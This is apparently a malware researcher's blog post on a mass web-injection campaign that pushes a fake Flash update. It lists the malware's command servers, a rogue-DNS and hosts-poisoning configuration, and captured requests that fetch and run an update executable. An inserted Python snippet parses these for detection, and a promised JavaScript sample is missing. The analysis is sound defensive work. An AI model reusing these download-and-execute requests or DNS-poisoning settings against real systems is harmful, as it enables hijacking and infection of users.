During the last couple of days I have, together with Yury Namestnikov, been investigating the extremely high number of infected websites. It all started when I was going through local statistics for Sweden and saw an increase of 3700% on a certain JavaScript redirector, as well as new detections of new variants of Java, PDF and Flash exploits. I published an article about this saying that Sweden was under attack, and you can read the blog post here.
But after some more research I noticed that it was not just Sweden that was affected; it seemed to be a global epidemic. I also noticed that we were talking about two different redirectors: Trojan.JS.Redirector.ro and Trojan.JS.Pakes.cp.
The Schema
So, what is actually happening? The gang behind this is exploiting web applications and injecting HTML code that loads a JavaScript redirector. Exactly which vulnerability they are exploiting is still unclear, but millions of websites are affected by this attack. What we know is that they inject the code via SQL injection; whether the underlying weakness is poorly configured servers or a zero-day vulnerability is still unclear. The JavaScript loaded by the injected HTML code looks like the following:
In the next step, the victims are redirected to a server that validates the origin (country) of the victim. Depending on the location, a malicious payload is executed. In one example we have seen, users are redirected to a malicious website posing as a YouTube video, which tries to get the user to download an "update" to Flash Player that is actually malware.
The technical setup is almost identical to the Lizamoon case we read about a few months back: same filenames, same techniques, and the server setups also look very similar.
Malware analysis (ongoing!)
If the victim downloads and executes the fake Flash update, it will upon execution connect back to the following servers:
- 209.212.147.141/chrome/report.html
- 98.142.243.64/chrome/report.html
- 65.98.83.115/?19= (Virtual Host: update.19runs10q3.com)
Upon execution the malware modifies the hosts file and “poisons” known domains. It makes the infected computer use rogue DNS servers and redirects users to malicious websites. The following configuration file has been extracted from the malware:
```ini
[redirected_dns]
-affiliate=9;
-DnsServerIp=66.197.152.72;
-DnsServerIp=75.102.22.72;
-DnsServerIp=205.234.236.192;
-FakeDnsServerIp=66.197.152.71;
-FakeDnsServerIp=75.102.22.71;
-FakeDnsServerIp=205.234.236.191;

[redirect_timeouts]
-response_timeout=40000;
-redirect_deactivating_interval=40020;

[reports]
-Version=260;
-host=98.142.243.64/chrome/report.html;
-host_first=209.212.147.141/chrome/report.html;
-check_timeout=10000;
-disable_reports=0;

[AntiRB]
-server=65.98.83.115;

[GUI]
-long_start=0;

[UAC]
-DelayBeforeRun=10;

[redirected_ips]

[redirected_domains]
-www.google.com.=87.125.87.99;
-google.com.=87.125.87.103;
-google.com.au.=87.125.87.104;
-www.google.com.au.=87.125.87.147;
-google.be.=77.125.87.148;
-www.google.be.=77.125.87.149;
-google.com.br.=77.125.87.109;
-www.google.com.br.=77.125.87.150;
-google.ca.=77.125.87.152;
-www.google.ca.=77.125.87.153;
-google.ch.=77.125.87.155;
-www.google.ch.=77.125.87.158;
-google.de.=77.125.87.160;
-www.google.de.=77.125.87.161;
-google.dk.=92.125.87.123;
-www.google.dk.=92.125.87.160;
-google.fr.=92.125.87.154;
-www.google.fr.=92.125.87.134;
-google.ie.=92.125.87.170;
-www.google.ie.=92.125.87.177;
-google.it.=92.125.87.173;
-www.google.it.=92.125.87.147;
-google.co.jp.=92.125.87.103;
-www.google.co.jp.=84.125.87.147;
-google.nl.=84.125.87.103;
-www.google.nl.=84.125.87.147;
-google.no.=84.125.87.103;
-www.google.no.=84.125.87.147;
-google.co.nz.=84.125.87.103;
-www.google.co.nz.=84.125.87.147;
-google.pl.=84.125.87.103;
-www.google.pl.=64.125.87.147;
-google.se.=64.125.87.103;
-www.google.se.=64.125.87.147;
-google.co.uk.=64.125.87.103;
-www.google.co.uk.=64.125.87.147;
-google.co.za.=64.125.87.103;
-www.google.co.za.=64.125.87.147;
-www.google-analytics.com.=64.125.87.101;
-www.bing.com.=92.123.68.97;
-search.yahoo.com.=72.30.186.249;
-www.search.yahoo.com.=72.30.186.249;
-uk.search.yahoo.com.=87.248.112.8;
-ca.search.yahoo.com.=100.6.239.84;
-de.search.yahoo.com.=87.248.112.8;
-fr.search.yahoo.com.=87.248.112.8;
-au.search.yahoo.com.=87.248.112.8;
-ad-emea.doubleclick.net.=64.125.87.101;
-www.statcounter.com.=64.125.87.101;

[redirected_domains_hosts]
-www.google-analytics.com.=64.125.87.101;
-ad-emea.doubleclick.net.=64.125.87.101;
-www.statcounter.com.=64.125.87.101;
```
The malware then changes the DNS configuration by modifying the hosts file to poison the following hostnames:
- 74.55.76.230 www.google-analytics.com.
- 74.55.76.230 ad-emea.doubleclick.net.
- 74.55.76.230 www.statcounter.com.
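As an added illustration (not code from the original post), the following Python parses the INI-like configuration format shown above, lists the resolver IPs the malware pushes, and checks a hosts file against the [redirected_domains_hosts] section. The sample config and hosts contents are constructed excerpts using values from the post; the function names are my own.

```python
from collections import defaultdict

# Constructed excerpt of the configuration format shown above (values are those in the post).
SAMPLE_CONFIG = """[redirected_dns]
-affiliate=9;
-DnsServerIp=66.197.152.72;
-FakeDnsServerIp=66.197.152.71;
[redirected_domains]
-www.google.com.=87.125.87.99;
[redirected_domains_hosts]
-www.google-analytics.com.=64.125.87.101;
-www.statcounter.com.=64.125.87.101;
"""

# Constructed hosts file: one benign loopback entry plus two poisoned entries from the post.
SAMPLE_HOSTS = """127.0.0.1 localhost
74.55.76.230 www.google-analytics.com.
74.55.76.230 www.statcounter.com.
"""

def parse_config(text):
    """Parse the INI-like dump into {section: [(key, value), ...]}.
    Entries look like '-key=value;'; the leading '-' and trailing ';' are stripped."""
    sections = defaultdict(list)
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
        elif current is not None and "=" in line:
            key, _, value = line.lstrip("-").rstrip(";").partition("=")
            sections[current].append((key, value))
    return dict(sections)

def rogue_resolvers(cfg):
    """Resolver IPs the malware points victims at (both 'DnsServerIp' and 'FakeDnsServerIp')."""
    return sorted({v for k, v in cfg.get("redirected_dns", []) if k.endswith("DnsServerIp")})

def poisoned_hosts_entries(hosts_text, cfg):
    """Hosts-file entries whose hostname is one the config overrides via [redirected_domains_hosts]."""
    targets = {k.rstrip(".").lower() for k, _ in cfg.get("redirected_domains_hosts", [])}
    hits = []
    for raw in hosts_text.splitlines():
        parts = raw.split("#", 1)[0].split()   # drop comments, split on whitespace
        if len(parts) < 2:
            continue
        ip, names = parts[0], parts[1:]
        hits.extend((name, ip) for name in names if name.rstrip(".").lower() in targets)
    return hits
```

Running the same checks against a live machine means feeding it the real hosts file and comparing the configured resolvers with the IPs the parser returns.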
Additionally, the malware will download and execute updates. The following requests have been collected:
```
v=spf1 a mx ip4:%d.%d.%d.%d/%d ?all

/?controller=hash HTTP/1.1
Host: update1.randomstring.com
User-Agent: IE7

/?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3 HTTP/1.1
Host: update1.randomstring.com
User-Agent: IE7

HTTP/1.1 /update_c1eec.exe
Host: update1.randomstring.com
User-Agent: IE7

/?abbr=RTK&setupType=update&uid=%d&ttl=%s&controller=microinstaller&pid=3 HTTP/1.1
Host: update1.randomstring.com
```
We are also seeing a very high increase in Java, PDF and Flash exploits in the wild, but we are still unsure whether this attack is also responsible for exploiting victims exposed to these vulnerabilities. In all countries mentioned in the statistics, however, these exploits have increased dramatically in September and October. As soon as I have more information I will publish it.
Ongoing analysis of the web infection